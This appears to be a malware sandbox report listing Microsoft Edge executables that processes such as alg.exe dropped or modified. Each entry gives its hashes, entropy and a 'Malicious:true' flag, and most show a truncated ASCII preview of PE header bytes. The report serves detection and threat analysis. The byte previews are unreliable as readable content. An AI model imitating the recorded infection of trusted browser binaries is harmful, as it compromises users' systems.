                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@....................................X..... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.748491255670945
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:qB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8E0Dmg27RnWGj:EHzorVmr2ZkRpdJYoleD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:BEC5CB77EEEFEED61D2DC0D43744B309
                                                                                                                                                                                                                                                                                                                                                    SHA1:4E0F5383CD26944B33E661D57016295C72C9F1CA
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B836F7DE823BBE9CBDBDFBD874F632F45D70E45CE4BDC9AC2D72874F8A56B78D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2D4CA0364464F0D2234AA02F223BBFDBC3A3022EC441A77ED6308EF01AC74226ADBB22955326AE21CBF93A586B7B1CE25CC0F8E06003BB21D9274C6AD7DD2C8C
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1238528
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.146943007352681
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:S3w1uVdSEjfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:SEyTfsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:4E2198E4AED547277DD6DC98A54E90EE
                                                                                                                                                                                                                                                                                                                                                    SHA1:57061EC924FBB4D35FAA88C30EFB7987D7786E3E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0992005CE733CC14038A468EB77E91FE65178A94701B10F0AAAD21F58B3B5314
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5F230AAFF0418447ED9A057F18F5B70E9F8D1458A4361FC57062777A105507BD3A489B990787C3521A13DC1F54C52427390E32E421997D9F508F9EF3AA2F292C
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P......{Q.... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.049988995561512
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:QhDdVrQ95RW0YEHyWQXE/09Val0GuDmg27RnWGj:QhHYW+HyWK1D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:D70E9DD978CEC9B2F71CAD2BF25D3351
                                                                                                                                                                                                                                                                                                                                                    SHA1:98E62F7E6B1B50DC169CA462E637894FBFA86520
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9BBD0A4B75F9B89EA7B159A6169730B71674B88FDF35866BC66DAB2064B3F682
                                                                                                                                                                                                                                                                                                                                                    SHA-512:01ACD72A906D69F7D765A0FA89B681088DF47A63D0FCE889E1CA3149C0B3BE6740CA076D28A547CECBE9B70AA4B411A299F226A6E6B4F39BD8B7AA30AE7CEE7B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%........... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.158515249988856
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Z70E0ZCQZMiU6Rrt9RoctGfmddYsqjnhMgeiCl7G0nehbGZpbD:d0EzQSyRPRoc1oDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:8BE1DB966932191237D7340EC23C5D9B
                                                                                                                                                                                                                                                                                                                                                    SHA1:149CEE28F687D963C18F8B5D39A524B87354854A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E31CE2356BC609DDAAA274E321BF74776AB76980006CA5DB239B205258DE46F2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8D271558ECE6A8546A9B69EDB78EEFA90FEA6725B632ED9939D1BBC615F17E86810A3C7BAFEAFEC3E696EBB8525A8CEE9EB3BB343D8E0F4F3B362A4FC30D359B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0.......j.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.145492426413554
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:viD2VmA1YXwHwlklb8boUuWPg2gbsqjnhMgeiCl7G0nehbGZpbD:qD2VmAyiwIb8boQUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:1EC8E5779FEF3A59A3E75B9E9B2AD818
                                                                                                                                                                                                                                                                                                                                                    SHA1:FA1841E8BEFCFDF6FE45D021D093289FD6B0AD2E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2357FB938F56EB018A0DF1662FEC949F675F5A873325FB815137DFE5F54DECCC
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8C34A8CB66EA785F676AAFD3DD9F8D49A997E3AA2E13856EFE70624304BDD118864012B03BADE07E16F8118B463F754F28D8A4890D5750777FCA05D1697FDE9B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......i.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.950759853675308
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:QfD3zO9ZhBGloizM3HRNr00sDmg27RnWGj:6DaalxzM00sD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:49B0EBB0F907EB64165FB848D1C38326
                                                                                                                                                                                                                                                                                                                                                    SHA1:3DE68B5D5D1750BB03FCF23622B603387633CF2B
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CF716EE7D197EED04A2A041AC956A8FB48B22B81A8F37F32B3C7FA44AE38DBA1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2FA84DCE04EB9B8DD4CD962C416B2115A3959FA60997881901F9A8EB6964E0EFE105DA1E03A5F8D1396B5E127994FC2CE31F9886A149681236DD0DF3AB235EC2
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.824627211926078
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:+TaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPh7Dmg27RnN:xI72LvkrDpbxJRoIMED527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:80F0F4BB7F7715A4DBCBAC043D6F0C7D
                                                                                                                                                                                                                                                                                                                                                    SHA1:AD2918233F7C4B58A70AD48212F84358C171025A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9FFB1FFE04FBF5C02E5A58381C82B3E89D9D65E69EF826692D1E9C690296AA25
                                                                                                                                                                                                                                                                                                                                                    SHA-512:53207EDBDA4DF3F5F148A74E22B5957BAE4D1E725E46C714FCC52F356F601DCEF482FAC223089A289C8CFD5F5752EC8B0D5AFCC324E8E7B85AC8C11779F90ECB
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....x.B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.097259330462941
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:TW9Jml9mmijviMnF+ZxmQWcbLw8VIsqjnhMgeiCl7G0nehbGZpbD:TWnm5iOMkjmQWkV0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:54584AC4C10C60AB9EBA0FE907F7FC61
                                                                                                                                                                                                                                                                                                                                                    SHA1:369097633128BBC499C76B75060F56231E082BA5
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7FA984BB7E7B02779DD9A290F0BB5F99555B091A211DD41CDFEC41523FB44096
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D13123A9E835CE4ACA6C6800544A3C206A93804803B7F02C2577C172575F88E463F93DE33036206C5C1E948904067E53A2F087FC0F3E68986CBEA1B47D1809FE
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....5..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166367432408611
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:WwNHwoYhua6MtjRO4qbBJTY6mY1uIgisqjnhMgeiCl7G0nehbGZpbD:WwNPdQO7BJTfmElDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:5C832DB96D31214D25E479A1869598ED
                                                                                                                                                                                                                                                                                                                                                    SHA1:95802B47D5A821A2AE3D51BA4029C839B30F88D0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:900DD7C9602D9C49844D8A67AB6159FB39170823AB06DA081C816D9E71235E24
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B5CCC790725CFBBB7ACE8419343A66CA5694AA851D3C236A75EBDF88C78F0E9B6D81A03529F0697549847DD85FB19630F0957107B7ECC156034AF18EF048E2C8
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.145505400713692
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:JiD2VmA1YXwHwlklb8boUuWPg2gbsqjnhMgeiCl7G0nehbGZpbD:ID2VmAyiwIb8boQUDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:C07ED499F2CFE8B7D40D398A6319C9B9
                                                                                                                                                                                                                                                                                                                                                    SHA1:7288B7649036FBC8D7F801D6FCFE3468CF498AA9
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CFE9AB2CF89B0B8CC6B5314F4B1520743E0CFEC26690089756F049AEB872F8CB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D44604548156191F4B4541FADF1047F167DAFBDE0D832C8DE306F08C45A0D44C2ADBD6CD5FFD5993179F3FCAAC733D276EF618AD11EF2FE2192FEE4B5B1362EF
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......0j.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166382734110445
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:PwNHwoYhua6MtjRO4qbBJTY6mY1uIgisqjnhMgeiCl7G0nehbGZpbD:PwNPdQO7BJTfmElDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:D7E25B3568023902C9AFC91618530D8B
                                                                                                                                                                                                                                                                                                                                                    SHA1:DFFE9E7FAE73B1A590B11B18CC2FD6F19A7F270D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:C42EE00C1CAFDB6877846950D53D86B500633C5678C1361658F9EE689AA01236
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D986AB021112830B8E726D233E9A0ADC5CD209CC9BBEEEBBC07B2EADB0230BC5A5C02AEE9BBCEC900B64DE6E9A5F3929F4104C76D0042AD73DBF6433187427CF
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................-*.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1325568
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.141864615182121
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:c4lbht6BH9sqjnhMgeiCl7G0nehbGZpbD:NlNtqHhDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:2FB887F14765F5FF5C39A0570C449623
                                                                                                                                                                                                                                                                                                                                                    SHA1:7266F9E2586F4160D5E369110D93C3D3D4986002
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4DFCEAC318479D82CB46422B59DC8F0AE380793126403477F7D55078540E82D2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0D0890973994C2E4DA2313E5D42D5D4FA47021F19E41F4B6208A5671637231E396E43B761A58F880F09131DA6E20EB7C9E04558C26B6B99E1B2ACFA9FD64AC0F
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@..................................b......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.138861265658774
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:wIkOkTB+wRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:wIxkTBVRsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:ACFC609282199DCED7D19DCEB946F42D
                                                                                                                                                                                                                                                                                                                                                    SHA1:84F13FB4837733B92998B1F41114B4A3AC325F79
                                                                                                                                                                                                                                                                                                                                                    SHA-256:EFE76729CDF4C3F74A85E704F869772C52B2B58BB41C4CD8C4A5E6D073102DE0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:BAB196B49CD5E2568E0EE36D81BC78E78D07A0617ADA11EC8544C56C5F040B571B2CA5AF6FDB51B218A4E2E28B70DA8686BFD84DDEBCD7466A5EC2AAD6ED57C5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@..................................>......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1335296
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.236795122252887
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:x4lssmroCqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:xcssmrUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:EA538B11B909EACEF2E3922406888EA1
                                                                                                                                                                                                                                                                                                                                                    SHA1:7989BAFAE860F5AE156FF17C6BAD506F6AC51892
                                                                                                                                                                                                                                                                                                                                                    SHA-256:481B035AFBD5A83CD62154B3F46715C0263BE0A87BEDB1182D74E83D581E43ED
                                                                                                                                                                                                                                                                                                                                                    SHA-512:538D465B928AFC17F4AECDF1FCFB181C5B09A0DAB4D14069F7B8E615AE7DACA28F748EA11BBD2C99676A549798F5BB9D0AF2BF3F9B0E4651CB37D61D9768A470
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
